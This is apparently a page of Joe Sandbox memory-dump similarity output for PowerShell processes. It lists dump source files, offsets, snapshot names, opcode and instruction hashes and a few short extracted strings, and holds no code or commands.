                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7d1330bfafdb9e6c7657451e393d6c729ce0336fe4898a2938df1e802281b78
                                                                        • Instruction ID: c6d28f7fd93c46d86e154b02adfe07ef8481fe04ee366478e82b058f8e6cfa18
                                                                        • Opcode Fuzzy Hash: e7d1330bfafdb9e6c7657451e393d6c729ce0336fe4898a2938df1e802281b78
                                                                        • Instruction Fuzzy Hash: A401D6714093449AE720AA2ADD84B67BFD9EF41324F2CC52AED494B2C6C679D841C7B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1838861823.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_d8d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99f29fe69bf706f293c185a2b2037be6846ec5aea13574094eacededc8665ca8
                                                                        • Instruction ID: d840d1b57ebe9a7576aa06d87fc7e928f6d6aec3953c2c71001215f8ed8cac6e
                                                                        • Opcode Fuzzy Hash: 99f29fe69bf706f293c185a2b2037be6846ec5aea13574094eacededc8665ca8
                                                                        • Instruction Fuzzy Hash: 67010C6240E3C49ED7128B258C94B52BFB4EF53224F1DC5DBD9888F1E7C2699849C7B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1839276643.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec102f48a3cf7f9ada7a0df10302460569a4cc3e3cca1f2d982758b53486b29d
                                                                        • Instruction ID: e2fa3848c21843382d4bf39c75592abbb6e22c614bd683c1e891e536168049d9
                                                                        • Opcode Fuzzy Hash: ec102f48a3cf7f9ada7a0df10302460569a4cc3e3cca1f2d982758b53486b29d
                                                                        • Instruction Fuzzy Hash: 0FF0D435A001099FDB15CF9DD990AEEF7B1FF88324F208159E515A72A1C736AC62CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1839276643.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h$h$h$h$h$h$h$h$h
                                                                        • API String ID: 0-3921215760
                                                                        • Opcode ID: 3987790a464d80b7ae50f846b1a66e3b773aa7b7121c95ef47cc8c988ecffcda
                                                                        • Instruction ID: 43a8c24a1d6fb3c508597c8bc51d9329adf20042dc2e6e8311a8a3dcc93a0908
                                                                        • Opcode Fuzzy Hash: 3987790a464d80b7ae50f846b1a66e3b773aa7b7121c95ef47cc8c988ecffcda
                                                                        • Instruction Fuzzy Hash: EF312D4394E3E10FE353A66C69B62D57F618F13568F0A06E7CCD48B1A3B905195E83E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q
                                                                        • API String ID: 0-2964369666
                                                                        • Opcode ID: baf63e587fafc419b8b35789fcfbed82f90c4aa4f432a5e522526391ee4350e6
                                                                        • Instruction ID: 6a5c5a306b38bcf15025eb54d619992c0afe278b4c87865a5a797cd157fc7651
                                                                        • Opcode Fuzzy Hash: baf63e587fafc419b8b35789fcfbed82f90c4aa4f432a5e522526391ee4350e6
                                                                        • Instruction Fuzzy Hash: 244222F17042958FEB18CB699420A6ABFE6EFC6210F14C4EED505CF295DE32CA45C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$$^q
                                                                        • API String ID: 0-4240210763
                                                                        • Opcode ID: b9b87421ab4e33c88b0d90b6db4f92411498325b7d54f43c66683d0787da694e
                                                                        • Instruction ID: 811ade8d878f5638d4b928b22e3103a099738954c62bb46c6210f1c35b068eb8
                                                                        • Opcode Fuzzy Hash: b9b87421ab4e33c88b0d90b6db4f92411498325b7d54f43c66683d0787da694e
                                                                        • Instruction Fuzzy Hash: 75E163B1B042958FEB15CB68D42076ABFA2EF82210F18C4FFD445CF265DA32CA45C791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                        • API String ID: 0-3272787073
                                                                        • Opcode ID: 2c792502b58c0f1d11e6e9bad51edd4db59b9a08244bafb766e228992ecc03f5
                                                                        • Instruction ID: 85511636b8b89ce04049b03df6c63c17126dcbb30667b54e6a3c52f05fc17c28
                                                                        • Opcode Fuzzy Hash: 2c792502b58c0f1d11e6e9bad51edd4db59b9a08244bafb766e228992ecc03f5
                                                                        • Instruction Fuzzy Hash: CA5103F1B0420ACFEB24EA299C5067A7BA5EFC1210F14C0BED515CF295EE32C985C761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                        • API String ID: 0-1420252700
                                                                        • Opcode ID: 405ba8c843852abda6e786ed28348af690458a9bc5bb54db6d221bb855049131
                                                                        • Instruction ID: a5c44ac93105127d10de8369f689879597c2d2b6d6ed4f4bccad5640ee14491a
                                                                        • Opcode Fuzzy Hash: 405ba8c843852abda6e786ed28348af690458a9bc5bb54db6d221bb855049131
                                                                        • Instruction Fuzzy Hash: AD2212F1B042168FEB24CB689910BAABBA6FF95211F14C4FED505CF395EA31C845C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$$^q$$^q
                                                                        • API String ID: 0-2291298209
                                                                        • Opcode ID: eebbdf877faf98b98fcaea3bd64baa8ad562bed7597720398c7808f399cfa32d
                                                                        • Instruction ID: f3b83c67571b1439c9fb653735f0c09458a76d01dce23283612c59f33148ac89
                                                                        • Opcode Fuzzy Hash: eebbdf877faf98b98fcaea3bd64baa8ad562bed7597720398c7808f399cfa32d
                                                                        • Instruction Fuzzy Hash: 6731CFF4B18206DBEB24EE24899077A77A5EF81211F14C0FED914CB296DB35C985CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tP^q$tP^q
                                                                        • API String ID: 0-309238000
                                                                        • Opcode ID: 0e21387a4c7b5d72e1eb95b28fc5becc66663e2236773ac43909330195893d95
                                                                        • Instruction ID: e252a3c2e6a7f19409455a1de4cf28828e141622d80691f48f906ba4fd8a7ffd
                                                                        • Opcode Fuzzy Hash: 0e21387a4c7b5d72e1eb95b28fc5becc66663e2236773ac43909330195893d95
                                                                        • Instruction Fuzzy Hash: BE415EB1B00258AFE7149B68D814B6ABBE6EF84700F24C459E848EF382CA71DC45C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$tP^q
                                                                        • API String ID: 0-1785267070
                                                                        • Opcode ID: 6760ef929fb048daf82c2f634baecaae926e548fa26740ff311032b9492c983e
                                                                        • Instruction ID: 8b9f1170b8a3e7722d3b3002f7524cfbc8640ef0d848a8b402476789e175c89d
                                                                        • Opcode Fuzzy Hash: 6760ef929fb048daf82c2f634baecaae926e548fa26740ff311032b9492c983e
                                                                        • Instruction Fuzzy Hash: C931C2F0B002459BEB28CE19C564B66BFE2EF89710F15C0EED9158B254DB31DE45CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a05db8b5000b9fb96cb7325acadec02e1333ef1becf89e4b8ecd24fd4d07535
                                                                        • Instruction ID: 8a36add1c574914b0cf5a26d76428c3fe61cc333f7f5e639e643ab7d724ec99f
                                                                        • Opcode Fuzzy Hash: 2a05db8b5000b9fb96cb7325acadec02e1333ef1becf89e4b8ecd24fd4d07535
                                                                        • Instruction Fuzzy Hash: 27623C39A00208EFDB15CFA8D584A9DFBF2BF88310F258559E815AB365C735ED85CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f586930fc339f582f29b82e6f450873f3ef5dc53a992b9dde2129fcbddd6032
                                                                        • Instruction ID: 91855d1169638bb1ef207ec8d555103857c702d0527e554e7e4da34f0b90fc47
                                                                        • Opcode Fuzzy Hash: 8f586930fc339f582f29b82e6f450873f3ef5dc53a992b9dde2129fcbddd6032
                                                                        • Instruction Fuzzy Hash: 1F81CE79A042458FCB06CF58C494ABEFBB1FF48310B24859AD4559B365C376FC51CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e55d0b0c0984843540c90c0ad5c6ef928d38d2f05744774407913dd116960cd4
                                                                        • Instruction ID: d7b87e8dd5ca56f2ea79632e9230559ad378f11237d364171bdbe4492a3b7671
                                                                        • Opcode Fuzzy Hash: e55d0b0c0984843540c90c0ad5c6ef928d38d2f05744774407913dd116960cd4
                                                                        • Instruction Fuzzy Hash: 91511835A00208EFDB15CBA8D484AADFBF2BF88310F24C559E405AB365C735ED86CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb1ef301891f78db98fca5781d54175f3d4b84a3a598f361f2c3e0078428e024
                                                                        • Instruction ID: 982417a348f8f353570c2a2065cfbe0b572aa6c6fa5b8260d1431e8e827769c1
                                                                        • Opcode Fuzzy Hash: cb1ef301891f78db98fca5781d54175f3d4b84a3a598f361f2c3e0078428e024
                                                                        • Instruction Fuzzy Hash: 8A41E1F0E002128FEB25CB249954AB97BA2FF81211F58C0EED900DF2A5D771C940CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07f937d9ab53892b21179fa1826f71852e9e8a5663dc81a02c69b2780c61de4e
                                                                        • Instruction ID: a70efd2648f382a40739f3a3700a53a99abc4b941ffa0f71ae1c9251c2015236
                                                                        • Opcode Fuzzy Hash: 07f937d9ab53892b21179fa1826f71852e9e8a5663dc81a02c69b2780c61de4e
                                                                        • Instruction Fuzzy Hash: 1B4127B9A005059FCB0ACF89C1989BAFBB1FF48310B218599D405AB368C772FC51CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 303697e7128baeb55b494d9af81948600dd4bcb81156ba883e923d6321b12623
                                                                        • Instruction ID: 0143ea996e16698b6ef1589a6a76911c88e82ab8aa3cbc1e65c79d79f15c13e2
                                                                        • Opcode Fuzzy Hash: 303697e7128baeb55b494d9af81948600dd4bcb81156ba883e923d6321b12623
                                                                        • Instruction Fuzzy Hash: 7A4106B9A005159FCB0ACF49C5989AAFBB1FF48310B118599D405AB368C776FC51CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d1e1ba754ba3191d6f5ee16c08c4d80899ad2058f292fcb930b41d4571f5395
                                                                        • Instruction ID: b3dbd09c40ea5446936a6d579eec758b7adc7976ed5772c07a52eb6e08176d8e
                                                                        • Opcode Fuzzy Hash: 0d1e1ba754ba3191d6f5ee16c08c4d80899ad2058f292fcb930b41d4571f5395
                                                                        • Instruction Fuzzy Hash: 2A2138B9A042099FCB15CF98D5909AEBBB1FF49310B158095E909AB351C735ED41CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c659bc66a5b5a985c419c193f62cb0b4bc5b4b4ca95c1503678e7594c8be27b
                                                                        • Instruction ID: f4851babf9e59c7e00fae2fede09572db6438ef2902ad1f8930ebef2218305ef
                                                                        • Opcode Fuzzy Hash: 4c659bc66a5b5a985c419c193f62cb0b4bc5b4b4ca95c1503678e7594c8be27b
                                                                        • Instruction Fuzzy Hash: BF11F335A00209AFDB45CBA8D484A9DFBF2BF88300F25C55AE415AB365C735E986CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825490657.0000000004CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_4cbd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8b42eba9967ef7767efacffb635d88175a33bd7f012db17fc0c3e215645851bc
                                                                        • Instruction ID: fe55cad846dc4ec5c7b4b5fdf139979614e6423ff0c247d6b07fa3fe6cd6653a
                                                                        • Opcode Fuzzy Hash: 8b42eba9967ef7767efacffb635d88175a33bd7f012db17fc0c3e215645851bc
                                                                        • Instruction Fuzzy Hash: 23015E6100E7C09FD7128B259C94B92BFB4EF53225F1DC4DBD9898F1A3C2699849C7B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825490657.0000000004CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CBD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_4cbd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4c5b8189f845eb5227893ce5dab6eeea9c5d450eadcb4f6d871119eef02da78
                                                                        • Instruction ID: 7070165ea078a3bdc7a799af2d28b5160b6b76e6335e82bc3d118f7cfe5d9962
                                                                        • Opcode Fuzzy Hash: e4c5b8189f845eb5227893ce5dab6eeea9c5d450eadcb4f6d871119eef02da78
                                                                        • Instruction Fuzzy Hash: 6101F7711097009AE7104E26FD847A7BF99EF41325F0CC42AED8A0B146C679E981C6F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1825945821.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_51a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7edfeb8509a920ef7abeef59f66a7dc40b26b9cbeced9a48d1c8cdb3deae2c40
                                                                        • Instruction ID: 4ea4d55140ddc43c0513dc107f9234f573155dafd0d256b0eff9cb46c2c7cb81
                                                                        • Opcode Fuzzy Hash: 7edfeb8509a920ef7abeef59f66a7dc40b26b9cbeced9a48d1c8cdb3deae2c40
                                                                        • Instruction Fuzzy Hash: B6D02B3F744104CBDB1BC554AD451CEF731E7C6210B119156C618533A3C335C61A97A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2125118731
                                                                        • Opcode ID: 10c8914a713974b51e80873e176ccdfcbd4faabf8a5a03d7c9f3322dc33ef966
                                                                        • Instruction ID: b9ff8c9f11f18c37f2f773b704652436bbd23b422bf104788105c1cfe50fc374
                                                                        • Opcode Fuzzy Hash: 10c8914a713974b51e80873e176ccdfcbd4faabf8a5a03d7c9f3322dc33ef966
                                                                        • Instruction Fuzzy Hash: 6481F4F570020E9FE714DB6CD840A6ABBA6EFC5210B18C4AEE416DB356DE32DD41C791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2125118731
                                                                        • Opcode ID: 88079e729a9266303188b798336b72d771c0be6bee253782c1cceda627664b14
                                                                        • Instruction ID: adffcc47a555d33883fa5c20998c9fbc32c9e568a530b2d79c10f5c2d627882c
                                                                        • Opcode Fuzzy Hash: 88079e729a9266303188b798336b72d771c0be6bee253782c1cceda627664b14
                                                                        • Instruction Fuzzy Hash: 7B2105B174420B9BEB34966AD840B27B6DADBC1710FA4C46EE409CF385DE72C84583B2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.1835282557.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7bc0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                        • API String ID: 0-2049395529
                                                                        • Opcode ID: b2dc2f5e189d47320fcc45a7a757ddebe4944b937287fc3cdc5a383d057ae75d
                                                                        • Instruction ID: d53c88701c0f47e852af0c42371d4815a18a2defa8f96510d48d9b81edaf4eb5
                                                                        • Opcode Fuzzy Hash: b2dc2f5e189d47320fcc45a7a757ddebe4944b937287fc3cdc5a383d057ae75d
                                                                        • Instruction Fuzzy Hash: 3BF02DE1B0424D8FF72966682C242656BB26FC1511B6AC0EFC080DF39BCD654C4A43D3